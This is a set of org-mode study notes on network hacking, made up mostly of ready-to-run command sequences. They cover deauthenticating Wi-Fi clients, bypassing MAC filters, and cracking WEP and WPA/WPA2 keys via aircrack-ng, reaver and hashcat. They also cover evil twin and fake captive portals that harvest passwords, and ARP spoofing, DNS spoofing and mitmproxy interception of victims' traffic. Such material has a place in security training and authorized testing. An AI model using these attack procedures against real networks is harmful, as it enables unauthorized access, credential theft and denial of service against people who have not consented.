* Network Hacking
** Preconnection Attacks
*** Wireless Modes (Managed & Monitor)

The wireless network interfaces can be listed by doing:

#+BEGIN_SRC bash
  iwconfig
#+END_SRC

If it's not available, ~wireless_tools~ must be installed.

To set the interface's mode to Monitor, we can do it by:

#+BEGIN_SRC bash
  ifconfig [interface_name] down
  sudo airmon-ng check kill # optional
  iwconfig [interface_name] mode monitor
  ifconfig [interface_name] up
#+END_SRC

*** Packet Sniffing

To sniff packets in networks around us, we can use airodump-ng, like this:

#+BEGIN_SRC bash
  airodump-ng [interface_name]
#+END_SRC

Wifi bands:
- *a*: 5Ghz
- *b*, *g*: 2.4 Ghz
- *n*: 5 and 2.4 Ghz
- *ac*: lower than 6 Ghz

By default, airodump sniffs on 2.4 Ghz. To specify a different band, we can run:

#+BEGIN_SRC bash
  airodump-ng --band [band(s)] [interface_name]
#+END_SRC

We can run it with several bands like:

#+BEGIN_SRC bash
  airodump-ng --band ab [interface_name]
#+END_SRC

We can run airodump against a single network like this:

#+BEGIN_SRC bash
  airodump-ng --bssid [network bssid] --channel [networks channel] [interface_name]
#+END_SRC

We can store the data of airodump to a file, using the ~write~ argument,
followed by the name of the file.

*** Deauthentication attack

We can run a deauthentication attack running the following command:

#+BEGIN_SRC bash
  aireplay-ng --deauth [#deauth_packets] -a [network_mac] -c [target_mac] [interface]
#+END_SRC

If we specify 0 deauth packets, it'll run the attack indefinitely. If we are
deauthenticating a client from a 5GHz network, we need to add the ~-D~ argument
to the aireplay-ng command.

We can deauthenticate multiple clients by executing the commands in the
background like this:

#+begin_src bash
	aireplay-ng --deauth [#deauth_packets] -a [network_mac] -c [target_mac1] [interface] &> /dev/null &
	aireplay-ng --deauth [#deauth_packets] -a [network_mac] -c [target_mac2] [interface] &> /dev/null &
	aireplay-ng --deauth [#deauth_packets] -a [network_mac] -c [target_mac3] [interface] &> /dev/null &
#+end_src

We can see all the jobs we have running on the background by executing ~jobs~.
And we can kill one process by doing ~kill %1~, for example. Replacing the ~1~
with the job number.

To disconnect *all* the clients, we can run the following command:

#+BEGIN_SRC bash
  aireplay-ng --deauth [#deauth_packets] -a [network_mac] [interface]
#+END_SRC

The command is the same, the only difference is that we are not specifying a
target with ~-c~. Notice that *airodump must be running against the target*
*network*. And also, the more devices we target, the less effective the attack
will be.

*** Bypassing Mac Filtering

Routers can use mac filtering to allow/deny devices from connecting based on
their MAC address. There are two implementations:

1. Using a *blacklist* to allow all MACs to connect, except the ones in a list
2. Using a *whitelist* to deny all MACs from connecting, except the ones in a
	 list.

To bypass a *blacklist* lal you have to do is to change the MAC address to a
random MAC address.

To bypass a *whitelist*, we'll first run airodump-ng against that network, and
set our MAC address to the one of any of the clients connected:

#+begin_src bash
	macchanger -m [mac_address] [interface_name]
#+end_src

** Gaining Access

*** Discovering Hidden Networks

When a network is configured to be hidden, only the network name is hidden, all
the other informatin is transmitted, and will appear in airodump-ng with an
ESSID of ~<length: 0>~. What we can do to get the name of a hidden network, is
to run airodump-ng against it, and deauthenticate one of its clients, when the
client connects back, the name of the network will be broadcasted into the air,
and airodump-ng will capture it.

*** WEP

If we have a .cap file (which can be generated by airodump-ng) with enough Data
packets, we can run aircrack-ng against it, to crack the WEP passkey:

#+BEGIN_SRC bash
  aircrack-ng [cap file]
#+END_SRC

If the network is not busy, it would take some time to capture enough data
packets, we can force the AP to generate new packets.

First, we need to associate with the network:

#+BEGIN_SRC bash
  aireplay-ng --fakeauth 0 -a [target_mac] -h [network_interface_mac] [network_interface]
#+END_SRC

*Note:* For all these attacks we need to be associated with the network, so
remember to run the fakeauth attack regularly.

**** ARP Request Reply Attack

When we are associated, we can force it to generate data packets like this:

#+BEGIN_SRC bash
  aireplay-ng --arpreplay -b [target_mac] -h [network_interface_mac] [network_interface]
#+END_SRC

**** Korek Chopchop Attack

This can be used when the network has no clients associated with it, or very low
traffic:

#+BEGIN_SRC bash
  aireplay-ng --chopchop -b [target_mac] -h [network_interface_mac] [network_interface]
#+END_SRC

Once the keystream is saved into a file (it doesn't need to be 100% decrypted),
we need to forge a fake packet using packetforge:

#+BEGIN_SRC bash
  packetforge-ng -0 -a [target_mac] -h [network_interface_mac] -k 255.255.255.255 -l 255.255.255.255 -y [xor_file] -w [output_filename]
#+END_SRC

Now we need to inject the packet into the traffic:

#+BEGIN_SRC bash
  aireplay-ng -2 -r [packet_filename] [network_interface]
#+END_SRC

**** Fragmentation Attack

We need to be close to the target for this attack, as we need to obtain 1500
bytes of PRGA.

#+BEGIN_SRC bash
  aireplay-ng --fragment -b [target_mac] -h [network_interface_mac] [network_interface]
#+END_SRC

Once the keystream is saved into a file, we need to forge a new packet:

#+BEGIN_SRC bash
  packetforge-ng -0 -a [target_mac] -h [network_interface_mac] -k 255.255.255.255 -l 255.255.255.255 -y [xor_file] -w [output_filename]
#+END_SRC

Now we need to inject the packet into the traffic:

#+BEGIN_SRC bash
  aireplay-ng -2 -r [packet_filename] [network_interface]
#+END_SRC

**** SKA WEP

Routers usually use OPN authentication, which means that anybody can associate
with the network without knowing the key. When SKA (Shared Key Authentication)
is used, we can only associate with the router if we know the key.

To crack this network, we can run an ARP Reply attack without associating, the
only difference is that the attack will be executed with the MAC address of one
of the connected clients, instead of the mac address of our network interface:

#+begin_src bash
	aireplay-ng --arpreplay -b [target_mac] -h [connected_client_mac] [network_interface]
#+end_src

*** WPA/WPA2

**** Without a wordlist (WPS)

To try to crack a WPA/WPA2 network without using a wordlist, we can exploit the
WPS authentication system, if it's misconfigured.

We can get a list of networks with WPS enabled by executing:

#+BEGIN_SRC bash
  wash --interface [interface_name]
#+END_SRC

and to crack the network, we first need to associate with the network:

#+BEGIN_SRC bash
  aireplay-ng --fakeauth 30 -a [target_mac] -h [network_interface_mac] [network_interface]
#+END_SRC

and then, we can bruteforce the WPS pin:

#+BEGIN_SRC bash
  reaver --bssid [target_mac] --channel [target_channel] --interface [interface_name] -vvv -A
#+END_SRC

***** Bypassing 0x2 and 0x3 errors

In case we get 0x3 and 0x4 errors in reaver, we can add the ~-N~ argument, to
stop it from sending NACK messages, the end command would be like this:

#+BEGIN_SRC bash
  reaver --bssid [target_mac] --channel [target_channel] --interface [interface_name] -A -N
#+END_SRC

***** Bypassing WPS Lock

We exploit WPS by bruteforcing its pin, this means we try every possible pin,
some routers lock after a number of failed attemps. The solution is to either
reset the router, or to get the user to reset their router.

To reset the router, we can use mdk3. Mdk3 is a tool designed to exploit a
number of weaknesses in 802.11 protocol, some of its exploits can cause the
router to reset, and some routers unlock their WPS when they reset, so we can
use MDK3 to remotely unlock locked routers. We can run the following command to
run an authentication DoS mode:

#+begin_src bash
	mdk3 [interface_name] a -a [target_mac] -m
#+end_src


**** With a wordlist

First, we need to capture the handshake, to do that, we just need to run
airodump-ng against our target network, and run a deauthentication attack to one
of the clients connected to the network, so the handshake is captured.

We can *generate a wordlist* with crunch:

#+BEGIN_SRC bash
  crunch [min] [max] [characters] -o [output_file]
#+END_SRC

To run the bruteforce attack, we just need to run this command:

#+BEGIN_SRC bash
  aircrack-ng [cap_with_handshake] -w [wordlist_file]
#+END_SRC

***** Saving Progress

To save the progress of a cracking session, we'll use John The Ripper to
display the wordlist. If we run:

#+begin_src bash
	john --wordlist=[wordlist_path] --stdout
#+end_src

The wordlist will be displayed in the standard output, and we can pipe it to
aircrack-ng:

#+begin_src bash
	john --wordlist=[wordlist_path] --stdout | aircrack-ng -w - -b [network_bssid] [handshake_file]
#+end_src

John the ripper can be used to pause and resume sessions if we add the ~session~
argument:

#+begin_src bash
	john --wordlist=[wordlist_path] --stdout --session=[session_name] | aircrack-ng -w - -b [network_bssid] [handshake_file]
#+end_src

And then to resume, we'd execute the following command:

#+begin_src bash
	john --restore=[session_name] | aircrack-ng -w - -b [network_bssid] [handshake_file]
#+end_src

***** Using Huge Wordlists Without Wasting Storage

We can pipe the output of crunch directly to aircrack so that it doesn't waste
storage:

#+begin_src bash
	crunch [min_len] [max_len] [characters] | aircrack-ng -b [bssid] -w - [handshake_file]
#+end_src

We can save, and restore the progress of the cracking progress using crunch, and
john the ripper again:

#+begin_src bash
	crunch [min_len] [max_len] [characters] | john --stdin --session=[session_name] --stdout | aircrack-ng -w - -b [bssid] [handshake_file]
#+end_src

And to restore, we'd execute this command:

#+begin_src bash
	crunch [min_len] [max_len] [characters] | john --restore=[session_name] | aircrack-ng -w - -b [bssid] [handshake_file]
#+end_src

***** Using a Rainbow Table

Computing the PMK is what takes the longest time when cracking WPA/WPA2 networks
using a wordlist, we can create a rainbow table, which is an especial wordlist
that has the PMK already computed. We can do this while we are waiting for the
handshake.

First, we'll create a new database:

#+BEGIN_SRC bash
  airolib-ng [database_name] --import passwd [wordlist_file]
#+END_SRC

Then, we'll import the ESSID to the database:

#+BEGIN_SRC bash
  echo "[ESSID]" > essid
  airolib-ng [database_name] --import essid essid
#+END_SRC

And finally, we'll convert each password in the list:

#+BEGIN_SRC bash
  airolib-ng [database_name] --batch
#+END_SRC

And to use it, we use aircrack-ng:

#+BEGIN_SRC bash
  aircrack-ng -r [database_name] [handshake_file]
#+END_SRC

***** Using the GPU

We can use [[https://hashcat.net/hashcat/][hashcat]] to crack a key using the GPU. Hashcat does not support ~.cap~
files, so we need to convert it using an [[https://hashcat.net/cap2hashcat/][online tool]] made by the hashcat
creators themselves.

And we can run hashcat like this:

#+BEGIN_SRC bash
  hashcat -I # to list the GPUs available to use for cracking
  hashcat -m 2500 -d [device_id] [hccapx_file] [wordlist]
#+END_SRC

***** Evil Twin Attack

For an evil twin attack we'll use Fluxion. Fluxion will:

- Start a fake AP with the same name as the target network
- Start a web server with a fake login page
- Disconnect all clients from this network
- Display the login page once a client connects to the fake AP
- Check the entered password, and make sure is the correct one

And to do all that, we just need to run ~fluxion~ and follow the steps.

*** Captive Portals

Captive portals are usually open networks with a login page.

There are a number of ways to bypass a captive portal:
1. Change *MAC address* to one of the connected clients.
2. Sniff logins in *monitor* mode
3. Connect and sniff logins after running an *arp spoofing* attack
4. Create a *fake AP*, ask users to login

**** Sniffing logins in *monitor* mode

Since captive portals are - usually - open networks, we don't use encryption, we
can sniff data using airodump-ng, and then use wireshark to read this data
including passwords.

If the login page is using HTTP instead of HTTPS, we can run a deauthentication
attack, the user will be prompted to login again, and we can sniff the
information.

In wireshark we can apply the ~http~ filter, and look for /POST/ requests.

**** Sniffing captive portal login information using ARP Spoofing

Since captive portals are open, we can run to the target network without a
password, we can run an *arp spoofing* attack, if we do so, clients will
automatically lose their connection, and will be asked to login again, data sent
to/from router including passwords will be sent to us.

#+begin_src bash
	mitmf --arp --spoof -i [interface_name] --gateway [gateway_ip_address]
#+end_src

Or we can use ettercap:

#+begin_src bash
	ettercap -Tq -M arp:remote -i [interface_name] ///
#+end_src

**** Creating a fake captive portal

What we'll do is: we'll clone the login page used by the original captive
portal, we'll create a fake AP with the same (or a similar) name, we'll deauth
users to use the fake network with the cloned page, and sniff the login info.

To clone the login page of the captive portal, we just need to Ctrl+S it.

To create the captive portal we need to install ~hostapd~, and ~dnsmasq~. We
need to first, flush iptables:

#+begin_src bash
	echo 1 | sudo tee -a /proc/sys/net/ipv4/ip_forward
	iptables --flush
	iptables --table nat --flush
	iptables --delete-chain
	iptables --table nat --delete-chain
	iptables -p FORWARD ACCEPT
#+end_src

We need a dnsmasq configuration file:

#+begin_src text
	interface=[interface_name]
	dhcp-range=[ip_range_given_to_clients]
	dhcp-option=3,[gateway_ip_address]
	dhcp-option=6,[dns_server_address]
	address=/#/[address_to_redirect_to]
#+end_src

For example:

#+begin_src text
	interface=wlan0
	dhcp-range=10.0.0.10,10.0.0.100,8h
	dhcp-option=3,10.0.0.1 # computer ip address
	dhcp-option=6,10.0.0.1
	address=/#/10.0.0.1
#+end_src

And we can run dnsmasq like this:

#+begin_src bash
	dnsmasq -C [config_file_location]
#+end_src

And we also need a configuration file for hostapd:

#+begin_src text
	interface=[interface_name]
	ssid=[ssid]
	channel=[channel]
	driver=[driver]
#+end_src

For example:

#+begin_src text
	interface=wlan0
	ssid=wifi
	channel=1
	driver=nl80211
#+end_src

And we have now to execute hostapd:

#+begin_src bash
  hostapd [config_file] -B
#+end_src

When hostapd is running, we must give an IP addres to our interface name, which
in previous examples was wlan0:

#+begin_src bash
  ifconfig wlan0 10.0.0.1 netmask 255.255.255.0
#+end_src

And now, we can sniff the login information with wireshark.

*** WPA/WPA2 Enterprise

In WPA/WPA2 Enterprise all users must have an user and a password to connect to
the network.

** Post-Connection Attacks

*** Information gathering
**** Discovering devices connected to the same network

We can get all the clients connected to a network, using ~netdiscover~ like
this:

#+BEGIN_SRC bash
  netdiscover -r [ip_range]
#+END_SRC
*** Ettercap

Ettercap is a tool for MITM attacks, it has a built-in sniffer, supports plugins
for DNS Spoofing, support for custom filters, etc.

We can access and modify the configuration file of ettercap at
~/etc/ettercap/etter.conf~. What we need to modify in the config file is:

- remove the comments of the iptables lines in the redir_command_on/off section.
- set the beginning of the file's ~ec_uid~, ~ec_gid~ to zero.

We can run ettercap like this:

#+begin_src bash
	ettercap -Tq ///
#+end_src

In that command, ~-Tq~ is to tell ettercap to run in text mode, and to be quiet,
and the three forward-slashes are so that we don't have to specify a target, but
rather, to just execute the program.

When ettercap is running we can press ~h~ to get some help, and we can also
press ~l~ to get a list of all the hosts that ettercap has discovered. (quit)
**** ARP Spoofing

We can run an arp spoofing attack like this with ettercap:

#+begin_src bash
	ettercap -Tq -M arp:remote -i [interface_name] -S /[gateway_ip]// /[target_ip]//
#+end_src

After executing that command, if checked the arp table of the target device, it
should've changed. The ~-S~ argument is not to generate self-signed SSL
certificates.

Ettercap automatically starts a sniffer as well, whenever the user logs in to
a website, or sends a request to a HTTP website, it'll be shown in ettercap.

To run a MITM attack against all clients, we can execute:

#+begin_src bash
	ettercap -Tq -M arp:remote -i [interface_name] -S ///
#+end_src

**** Poisoning new clients

Ettercap has a number of plugins, some of them can be used to:
- Auto-add new clients -> autoadd
- Re-poison clients after arp broadcasts -> repoison_arp
- DNS spoof targets -> dns_spoof

We can activate a plugin by: pressing ~p~, and entering the name of the plugin.
The zero at the left of the plugin means that it's inactive, we can see the
name, the version, and a description of what the plugin does.

If you are trying to target a whole subnet, you can activate the autoadd plugin,
so new clients are arp spoofed as well.

**** DNS Spoofing

We can do a DNS spoofing attack using Ettercap. First, we need to open the file
~/etc/ettercap/etter.dns~, and we can add hosts there like:

#+begin_src text
	bing.com        A       192.168.1.11
	*.bing.com      A       192.168.1.11
#+end_src

If you want, you can also run ettercap like this, to immediately run a plugin:

#+begin_src bash
	ettercap -Tq -M arp:remote -i [interface_name] -S -P [plugin_name] ///
#+end_src

**** Bypassing Router-side security

If a router implements some kind of security for ARP spoofing attacks, we can do
a one-way ARP spoofing with Ettercap. We can do it executing the following
command:

#+begin_src bash
	ettercap -Tq -M arp:oneway -i [interface_name] -S -P [plugin_name] /[victim_ip]// /[router_ip]//
#+end_src

Sometimes, the sniffer of ettercap might not capture everything when running a
one-way arp spoofing attack, to fix it, wireshark can be ran as the sniffer.

*** MITMproxy

MITMproxy can be used to intercept, analyse, modify, and replay packet flows, it
supports a number of proxy modes, TLS cert generation, etc.

MITMproxy supports two modes:
1. Explicit: user connects *directly* to the proxy.
2. Transparent: data is *redirected* to the proxy.

If we execute ~mitmweb~, it'll run mitmproxy in explicit mode, which means we'll
need to connect our browser to the proxy so that we can analyse data flow.

In the search bar there are several characters we can input to get different
results:

- ~~a~: will display page assets (CSS, JS, Flash, etc.) We can do ~~a .js~ to
	get only javascript files.
- ~~m~: will filter by method, i.e. ~~m POST~.
- ~~s~: will show only responses.
- ~~bs~: will filter based on the response body.

Another thing that can be done, is to intercept packets, to stop them from going
to their destination, to modify them, and to send them again. In intercept we
can use the same rules we can do with search, and highlight.

What we can do, is that we can add the intercept rule ~~bs </body>~ and it will
intercept all the pages that have a ~</body>~ tag to edit them.

If we are the man in the middle, we'll need to run the following command to
route the traffic of our target(s) to mitmproxy:

#+begin_src bash
	iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
	iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080
#+end_src

That command redirects all data from port 80, to port 8080 where Mitmproxy is
running. And we also need to run mitmproxy in transparent mode:

#+begin_src bash
  mitmweb --mode transparent
#+end_src

When we are finished, we need to flush the iptables rules:

#+begin_src bash
  iptables -t nat --flush
#+end_src
